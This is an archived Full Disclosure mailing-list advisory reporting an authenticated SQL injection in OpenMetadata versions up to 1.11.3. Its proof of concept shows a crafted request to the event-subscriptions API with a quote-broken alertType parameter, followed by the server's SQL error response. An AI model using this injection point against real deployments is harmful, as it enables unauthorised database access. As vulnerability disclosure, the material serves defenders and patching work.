Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

OpenMetadata <= 1.11.3 Authenticated SQL Injection

From: BUG <secbugs3 () gmail com>
Date: Tue, 20 Jan 2026 19:32:37 +0100
#### Title:OpenMetadata <= 1.11.3 Authenticated SQL Injection
#### Affected versions: <= 1.11.3
#### Credits: echo
#### Vendor: https://open-metadata.org/
OpenMetadata versions 1.11.3 and earlier are vulnerable to an authenticated SQL injection issue. Low-privileged users can exploit this vulnerability to gain unauthorized access to the database in the context of the database user associated with the application. 

POC:

request:
GET /api/v1/events/subscriptions?limit=15&alertType=Observability'[SQLI] HTTP/1.1/1.1 
Host: localhost
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 
Accept: application/json, text/plain, /
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Authorization: Bearer [redacted]
Referer [redacted]

response:

HTTP/1.1 500 Server Error
Content-Type: application/json
Content-Length: 562
Connection: close
Date: Thu, 23 Oct 2025 10:38:02 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
{"responseMessage":"An exception with message [java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Observability''' at line 1 [statement:"/* EventSubscriptionDAO.listCount */ SELECT count(nameHash) F 

-----BEGIN PGP PUBLIC KEY BLOCK-----

xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQ
m0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78
QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLl
oMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVT
HhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEB
B0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYh
BFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1
KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/
YPBCvA4bkQ9SA37Ak2UDDg==
=6VCh
-----END PGP PUBLIC KEY BLOCK-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: